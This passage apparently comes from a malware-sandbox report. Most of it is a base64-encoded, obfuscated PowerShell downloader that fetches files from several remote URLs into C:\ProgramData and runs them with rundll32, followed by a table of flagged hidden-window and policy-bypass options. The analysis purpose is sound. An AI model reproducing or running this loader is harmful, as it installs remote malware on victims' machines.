QQBNAGcAQQB1AEEARABVAEEATQBRAEEAdQBBAEQAZwBBAE4AUQBBAHUAQQBEAEkAQQBNAEEAQQAwAEEAQQA9AD0AaQBpAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AZwBBADUAQQBDADQAQQBNAFEAQQB6AEEARABrAEEATABnAEEAeABBAEQARQBBAE0AQQBBAHUAQQBEAEkAQQBNAEEAQQA1AEEAQQA9AD0AIgA7AHQAcgB5ACAAewAkAHQAcgBpAHMAbwBtAGUAQwBvAGwAZABuAGUAcwBzACAAPQAgACIAQgBlAGwAbABvAHcAaQBuAGcAIgA7ACQAQgBpAHQAdABlAGQASQBuAHQAZQBnAHIAYQB0AGkAbwBuACAAPQAgADkAOAA2ADsAJAByAHkAZQBnAHIAYQBzAHMAQQBtAGIAYQBzAHMAYQBkAG8AcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAHAAZQBpAHMAZQApACkAOwBpAHcAcgAgACQAcgB5AGUAZwByAGEAcwBzAEEAbQBiAGEAcwBzAGEAZABvAHIAIAAtAE8AIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABiAGkAcwB5AG4AYwAuAG0AYQBjAGsAaQBuAGIAbwB5ADsAJABNAG8AdABvAHIAbQBlAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADAAQQBiAHcAQgB1AEEARwA4AEEAWQBRAEIAdABBAEcAawBBAFoAQQBCAGwAQQBDADQAQQBiAFEAQgBoAEEASABJAEEAYQB3AEIAbABBAEgAUQBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATQB3AEEAdQBBAEQAawBBAE8AUQBBAHUAQQBEAEUAQQBNAGcAQQAzAEEAQwA0AEEATQBRAEEAMwBBAEQAUQBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBJAEEAWgBRAEIAbABBAEcAUQBBAGMAQQBCAHMAQQBHADgAQQBkAEEAQQB1AEEASABjAEEAYgB3AEIAeQBBAEcAcwBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBUAEEARwBzAEEAYgB3AEIAcwBBAEcAdwBBAGUAUQBBAHUAQQBHAFUAQQBaAEEAQgAxAEEARwBNAEEAWQBRAEIAMABBAEcAawBBAGIAdwBCAHUAQQBBAD0APQAiADsAJABVAG4AbABlAHYAZQBsAGkAbgBnACAAPQAgADYAMgA3ADsAJABNAHUAdAB0AG8AbgBzAFUAbgBjAGwAZQBhAG4AcwBlAGQAIAA9ACAAIgBNAG8AcgBnAGEAeQBHAGkAbgBnAGUAbAB5ACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYgBpAHMAeQBuAGMALgBtAGEAYwBrAGkAbgBiAG8AeQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMgA4ADUANQAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBZAGcAQgBwAEEASABNAEEAZQBRAEIAdQBBAEcATQBBAEwAZwBCAHQAQQBHAEUAQQBZAHcAQgByAEEARwBrAEEAYgBnAEIAaQBBAEcAOABBAGUAUQBBAHMAQQBIAEEAQQBjAGcAQgBwAEEARwA0AEEAZABBAEEANwBBAEUANABBAFoAUQBCADQAQQBIAFEAQQBTAGcAQgBUAEEAQQA9AD0AIgA7ACQARgB1AGQAZABsAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAEEAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQATQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB1AEEARABJAEEATQBnAEEAMgBBAEEAPQA9AHoAZABoAGUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBNAEEAWQBRAEIAMABBAEcAVQBBAGIAQQBCAHMAQQBHAGsAQQBkAEEAQgBsAEEASABNAEEAYQBRAEIAdABBAEcARQBBAGIAQQBCAFEAQQBHAGcAQQBaAFEAQgB1AEEARwA4AEEAYgBRAEEAdQBBAEcATQBBAFkAUQBCAGkAQQBBAD0APQAiADsAJABCAHIAbwBnAHUAZQBkACAAPQAgACIAdQBuAGMAbwBuAHMAbwBsAGEAYgBsAHkATwBvAHAAaABvAHIAaQBkAGkAdQBtACIAOwAkAGkAbgBoAG8AbQBvAGcAZQBuAGUAbwB1AHMARABhAGYAZgBhAGQAbwB3AG4AZABpAGwAbABpAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgBqAEEARwBnAEEAYQBRAEIAdwBBAEUAVQBBAGIAUQBCAGkAQQBIAEkAQQBiAHcAQgAzAEEARwBRAEEATABnAEIAdwBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBEAEEARwA4AEEAYgBnAEIAdQBBAEgAVQBBAFkAZwBCAHAAQQBHAEUAQQBiAEEAQgBzAEEASABrAEEAUQB3AEIAaABBAEcATQBBAGEAQQBCAGwAQQBHADAAQQBhAFEAQgBqAEEAQwA0AEEAZABBAEIAdgBBAEcAcwBBAGUAUQBCAHYAQQBBAD0APQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBNAEEAZQBRAEIAegBBAEgAUQBBAGEAUQBCAHUAQQBIAFUAQQBjAGcAQgBwAEEARwBFAEEAVgBBAEIAaABBAEcAZwBBAFkAUQBCAHMAQQBHAGsAQQBMAGcAQgB0AEEARwA4AEEAYwBnAEIAMABBAEcAYwBBAFkAUQBCAG4AQQBHAFUAQQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBnAEEAdQBBAEQASQBBAE0AdwBBADQAQQBDADQAQQBPAFEAQQAzAEEAQwA0AEEATQBRAEEAMgBBAEQAawBBACIAOwBiAHIAZQBhAGsAOwBOAGUAeAB0AEoAUwA7AH0ATgBlAHgAdABKAFMAOwB9ACAAYwBhAHQAYwBoACAAewAkAEoAbwB1AG4AYwBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AdwBBADIAQQBDADQAQQBNAFEAQQAxAEEARABZAEEATABnAEEAeABBAEQARQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQAxAEEAQQA9AD0AUgBiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE8AUQBBAHUAQQBEAFkAQQBOAGcAQQB1AEEARABFAEEATgBBAEEAMgBBAEMANABBAE0AZwBBADEAQQBEAEUAQQAiADsAfQB9ACQAbQBvAGQAdQBsAGEAcgBpAHoAaQBuAGcAQwByAHUAbgBrAGwAZQAgAD0AIAAzADIANAA7AA==" |
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -nologo | value | Hides the copyright banner when PowerShell launches | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -nologo | value | Hides the copyright banner when PowerShell launches | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window |
file | C:\Windows\SysWOW64\wscript.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |